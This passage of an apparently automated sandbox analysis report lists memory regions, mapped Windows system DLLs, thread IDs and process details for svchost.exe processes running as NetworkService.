"" Region: id = 3401 start_va = 0xe736f00000 end_va = 0xe736ffffff entry_point = 0x0 region_type = private name = "private_0x000000e736f00000" filename = "" Region: id = 3402 start_va = 0xe737000000 end_va = 0xe7370fffff entry_point = 0x0 region_type = private name = "private_0x000000e737000000" filename = "" Region: id = 3403 start_va = 0xe737200000 end_va = 0xe7372fffff entry_point = 0x0 region_type = private name = "private_0x000000e737200000" filename = "" Region: id = 3404 start_va = 0xe737300000 end_va = 0xe7373fffff entry_point = 0x0 region_type = private name = "private_0x000000e737300000" filename = "" Region: id = 3405 start_va = 0xe737400000 end_va = 0xe7374fffff entry_point = 0x0 region_type = private name = "private_0x000000e737400000" filename = "" Region: id = 3406 start_va = 0xe737500000 end_va = 0xe7375defff entry_point = 0xe737500000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3407 start_va = 0xe7375e0000 end_va = 0xe7376dffff entry_point = 0x0 region_type = private name = "private_0x000000e7375e0000" filename = "" Region: id = 3408 start_va = 0xe737800000 end_va = 0xe7378fffff entry_point = 0x0 region_type = private name = "private_0x000000e737800000" filename = "" Region: id = 3409 start_va = 0xe737a00000 end_va = 0xe737afffff entry_point = 0x0 region_type = private name = "private_0x000000e737a00000" filename = "" Region: id = 3410 start_va = 0xe737c00000 end_va = 0xe737cfffff entry_point = 0x0 region_type = private name = "private_0x000000e737c00000" filename = "" Region: id = 3411 start_va = 0xe737d00000 end_va = 0xe737dfffff entry_point = 0x0 region_type = private name = "private_0x000000e737d00000" filename = "" Region: id = 3412 start_va = 0xe737e00000 end_va = 0xe7385fffff entry_point = 0xe737e00000 region_type = mapped_file name = "~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1462094071-1423818996-289466292-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat") Region: id = 3413 start_va = 0x7df5ff870000 end_va = 0x7ff5ff86ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff870000" filename = "" Region: id = 3414 start_va = 0x7ff7877a6000 end_va = 0x7ff7877a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877a6000" filename = "" Region: id = 3415 start_va = 0x7ff7877a8000 end_va = 0x7ff7877a9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877a8000" filename = "" Region: id = 3416 start_va = 0x7ff7877ac000 end_va = 0x7ff7877adfff entry_point = 0x0 region_type = private name = "private_0x00007ff7877ac000" filename = "" Region: id = 3417 start_va = 0x7ff7877b2000 end_va = 0x7ff7877b3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b2000" filename = "" Region: id = 3418 start_va = 0x7ff7877b4000 end_va = 0x7ff7877b5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b4000" filename = "" Region: id = 3419 start_va = 0x7ff7877b6000 end_va = 0x7ff7877b7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b6000" filename = "" Region: id = 3420 start_va = 0x7ff7877b8000 end_va = 0x7ff7877b9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877b8000" filename = "" Region: id = 3421 start_va = 0x7ff7877bc000 end_va = 0x7ff7877bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7877bc000" filename = "" Region: id = 3422 start_va = 0x7ff7877be000 end_va = 0x7ff7877bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7877be000" filename = "" Region: id = 3423 start_va = 0x7ff7877c0000 end_va = 0x7ff7877c1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877c0000" filename = "" Region: id = 3424 start_va = 0x7ff7877c2000 end_va = 0x7ff7877c3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877c2000" filename = "" Region: id = 3425 start_va = 0x7ff7877c4000 end_va = 0x7ff7877c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877c4000" filename = "" Region: id = 3426 start_va = 0x7ff7877c8000 end_va = 0x7ff7877c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7877c8000" filename = "" Region: id = 3427 start_va = 0x7ff7877ca000 end_va = 0x7ff7877cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7877ca000" filename = "" Region: id = 3428 start_va = 0x7ff7877cc000 end_va = 0x7ff7877cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7877cc000" filename = "" Region: id = 3429 start_va = 0x7ff7877ce000 end_va = 0x7ff7877cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7877ce000" filename = "" Region: id = 3430 start_va = 0x7ff7877d0000 end_va = 0x7ff7878cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7877d0000" filename = "" Region: id = 3431 start_va = 0x7ff7878d0000 end_va = 0x7ff7878f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7878d0000" filename = "" Region: id = 3432 start_va = 0x7ff7878f3000 end_va = 0x7ff7878f4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7878f3000" filename = "" Region: id = 3433 start_va = 0x7ff7878f5000 end_va = 0x7ff7878f6fff entry_point = 0x0 region_type = private name = "private_0x00007ff7878f5000" filename = "" Region: id = 3434 start_va = 0x7ff7878f7000 end_va = 0x7ff7878f8fff entry_point = 0x0 region_type = private name = "private_0x00007ff7878f7000" filename = "" Region: id = 3435 start_va = 0x7ff7878f9000 end_va = 0x7ff7878fafff entry_point = 0x0 region_type = private name = "private_0x00007ff7878f9000" filename = "" Region: id = 3436 start_va = 0x7ff7878fb000 end_va = 0x7ff7878fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7878fb000" filename = "" Region: id = 3437 start_va = 0x7ff7878fe000 end_va = 0x7ff7878fffff entry_point = 0x0 region_type = private name = "private_0x00007ff7878fe000" filename = "" Region: id = 3438 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3439 start_va = 0x7ffaeafb0000 end_va = 0x7ffaeafcdfff entry_point = 0x7ffaeafb0000 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 3440 start_va = 0x7ffaeafd0000 end_va = 0x7ffaeafdcfff entry_point = 0x7ffaeafd0000 region_type = mapped_file name = "bthtelemetry.dll" filename = "\\Windows\\System32\\BthTelemetry.dll" (normalized: "c:\\windows\\system32\\bthtelemetry.dll") Region: id = 3441 start_va = 0x7ffaeafe0000 end_va = 0x7ffaeaff7fff entry_point = 0x7ffaeafe0000 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 3442 start_va = 0x7ffaeb500000 end_va = 0x7ffaeb513fff entry_point = 0x7ffaeb500000 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 3443 start_va = 0x7ffaeb520000 end_va = 0x7ffaeb52dfff entry_point = 0x7ffaeb520000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3444 start_va = 0x7ffaeb570000 end_va = 0x7ffaeb5fcfff entry_point = 0x7ffaeb570000 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 3445 start_va = 0x7ffaeb640000 end_va = 0x7ffaeb657fff entry_point = 0x7ffaeb640000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 3446 start_va = 0x7ffaeb690000 end_va = 0x7ffaeb6eefff entry_point = 0x7ffaeb690000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 3447 start_va = 0x7ffaec410000 end_va = 0x7ffaec419fff entry_point = 0x7ffaec410000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3448 start_va = 0x7ffaecef0000 end_va = 0x7ffaecf0cfff entry_point = 0x7ffaecef0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 3449 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3450 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3451 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3452 start_va = 0x7ffaf0ab0000 end_va = 0x7ffaf0abbfff entry_point = 0x7ffaf0ab0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 3453 start_va = 0x7ffaf0c00000 end_va = 0x7ffaf0c28fff entry_point = 0x7ffaf0c00000 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 3454 start_va = 0x7ffaf0c30000 end_va = 0x7ffaf0dd3fff entry_point = 0x7ffaf0c30000 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 3455 start_va = 0x7ffaf1590000 end_va = 0x7ffaf1609fff entry_point = 0x7ffaf1590000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3456 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3457 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3458 start_va = 0x7ffaf1b70000 end_va = 0x7ffaf1b87fff entry_point = 0x7ffaf1b70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3459 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3460 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3461 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3462 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3463 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3464 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3465 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3466 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3467 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3468 start_va = 0x7ffaf4300000 end_va = 0x7ffaf4397fff entry_point = 0x7ffaf4300000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3469 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3470 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3471 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3472 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3473 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3474 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3475 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3476 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3477 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3478 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3479 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3480 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3481 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3482 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3483 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3484 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3485 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3486 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3487 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 489 os_tid = 0x420 Thread: id = 490 os_tid = 0x798 Thread: id = 491 os_tid = 0x748 Thread: id = 492 os_tid = 0x70c Thread: id = 493 os_tid = 0x6f8 Thread: id = 494 os_tid = 0x6f4 Thread: id = 495 os_tid = 0x6f0 Thread: id = 496 os_tid = 0x6dc Thread: id = 497 os_tid = 0x6b4 Thread: id = 498 os_tid = 0x6a4 Thread: id = 499 os_tid = 0x598 Thread: id = 500 os_tid = 0x594 Thread: id = 501 os_tid = 0x584 Thread: id = 502 os_tid = 0x46c Thread: id = 503 os_tid = 0x134 Thread: id = 504 os_tid = 0x234 Thread: id = 505 os_tid = 0x12c Thread: id = 506 os_tid = 0x3f4 Thread: id = 507 os_tid = 0x3f0 Thread: id = 508 os_tid = 0x3ec Thread: id = 509 os_tid = 0x3a8 Process: id = "48" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x54243000" os_pid = "0x294" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:00010672" [0xc000000f], "LOCAL" [0x7] Region: id = 4376 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4377 start_va = 0x3b00000000 end_va = 0x3b0fffffff entry_point = 0x0 region_type = private name = "private_0x0000003b00000000" filename = "" Region: id = 4378 start_va = 0x3b10000000 end_va = 0x3b1fffffff entry_point = 0x0 region_type = private name = "private_0x0000003b10000000" filename = "" Region: id = 4379 start_va = 0x3b50ae0000 end_va = 0x3b50aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b50ae0000" filename = "" Region: id = 4380 start_va = 0x3b50af0000 end_va = 0x3b50af0fff entry_point = 0x3b50af0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 4381 start_va = 0x3b50b00000 end_va = 0x3b50b13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b50b00000" filename = "" Region: id = 4382 start_va = 0x3b50b20000 end_va = 0x3b50b9ffff entry_point = 0x0 region_type = private name = "private_0x0000003b50b20000" filename = "" Region: id = 4383 start_va = 0x3b50ba0000 end_va = 0x3b50ba3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b50ba0000" filename = "" Region: id = 4384 start_va = 0x3b50bb0000 end_va = 0x3b50bb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b50bb0000" filename = "" Region: id = 4385 start_va = 0x3b50bc0000 end_va = 0x3b50bc1fff entry_point = 0x0 region_type = private name = "private_0x0000003b50bc0000" filename = "" Region: id = 4386 start_va = 0x3b50bd0000 end_va = 0x3b50c8dfff entry_point = 0x3b50bd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4387 start_va = 0x3b50d10000 end_va = 0x3b50d10fff entry_point = 0x0 region_type = private name = "private_0x0000003b50d10000" filename = "" Region: id = 4388 start_va = 0x3b50d20000 end_va = 0x3b50d20fff entry_point = 0x0 region_type = private name = "private_0x0000003b50d20000" filename = "" Region: id = 4389 start_va = 0x3b50d30000 end_va = 0x3b50d30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b50d30000" filename = "" Region: id = 4390 start_va = 0x3b50d40000 end_va = 0x3b50d40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b50d40000" filename = "" Region: id = 4391 start_va = 0x3b50d50000 end_va = 0x3b50d56fff entry_point = 0x0 region_type = private name = "private_0x0000003b50d50000" filename = "" Region: id = 4392 start_va = 0x3b50d60000 end_va = 0x3b50ddffff entry_point = 0x0 region_type = private name = "private_0x0000003b50d60000" filename = "" Region: id = 4393 start_va = 0x3b50de0000 end_va = 0x3b50de8fff entry_point = 0x3b50de0000 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 4394 start_va = 0x3b50df0000 end_va = 0x3b50df0fff entry_point = 0x0 region_type = private name = "private_0x0000003b50df0000" filename = "" Region: id = 4395 start_va = 0x3b50e00000 end_va = 0x3b50efffff entry_point = 0x0 region_type = private name = "private_0x0000003b50e00000" filename = "" Region: id = 4396 start_va = 0x3b50f00000 end_va = 0x3b50fbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b50f00000" filename = "" Region: id = 4397 start_va = 0x3b50fc0000 end_va = 0x3b50fc4fff entry_point = 0x3b50fc0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 4398 start_va = 0x3b50fd0000 end_va = 0x3b50fd6fff entry_point = 0x0 region_type = private name = "private_0x0000003b50fd0000" filename = "" Region: id = 4399 start_va = 0x3b50fe0000 end_va = 0x3b50feffff entry_point = 0x3b50fe0000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 4400 start_va = 0x3b50ff0000 end_va = 0x3b50ff2fff entry_point = 0x3b50ff0000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 4401 start_va = 0x3b51000000 end_va = 0x3b510fffff entry_point = 0x0 region_type = private name = "private_0x0000003b51000000" filename = "" Region: id = 4402 start_va = 0x3b51100000 end_va = 0x3b51287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b51100000" filename = "" Region: id = 4403 start_va = 0x3b51290000 end_va = 0x3b51410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003b51290000" filename = "" Region: id = 4404 start_va = 0x3b51420000 end_va = 0x3b5151ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51420000" filename = "" Region: id = 4405 start_va = 0x3b51520000 end_va = 0x3b5161ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51520000" filename = "" Region: id = 4406 start_va = 0x3b51620000 end_va = 0x3b5171ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51620000" filename = "" Region: id = 4407 start_va = 0x3b51720000 end_va = 0x3b5181ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51720000" filename = "" Region: id = 4408 start_va = 0x3b51820000 end_va = 0x3b5191ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51820000" filename = "" Region: id = 4409 start_va = 0x3b51920000 end_va = 0x3b51a1ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51920000" filename = "" Region: id = 4410 start_va = 0x3b51a20000 end_va = 0x3b51b1ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51a20000" filename = "" Region: id = 4411 start_va = 0x3b51c20000 end_va = 0x3b51d1ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51c20000" filename = "" Region: id = 4412 start_va = 0x3b51d20000 end_va = 0x3b51e1ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51d20000" filename = "" Region: id = 4413 start_va = 0x3b51e20000 end_va = 0x3b51f1ffff entry_point = 0x0 region_type = private name = "private_0x0000003b51e20000" filename = "" Region: id = 4414 start_va = 0x3b51f20000 end_va = 0x3b52256fff entry_point = 0x3b51f20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4415 start_va = 0x3b52260000 end_va = 0x3b5226ffff entry_point = 0x3b52260000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4416 start_va = 0x3b52270000 end_va = 0x3b5227ffff entry_point = 0x3b52270000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4417 start_va = 0x3b52280000 end_va = 0x3b5228ffff entry_point = 0x3b52280000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4418 start_va = 0x3b52290000 end_va = 0x3b5229ffff entry_point = 0x3b52290000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4419 start_va = 0x3b522a0000 end_va = 0x3b522affff entry_point = 0x3b522a0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") Region: id = 4420 start_va = 0x3b522b0000 end_va = 0x3b522bffff entry_point = 0x3b522b0000 region_type = mapped_file name = "catdb" filename = "\\Windows\\System32\\catroot2\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\catdb" (normalized: "c:\\windows\\system32\\catroot2\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\catdb") 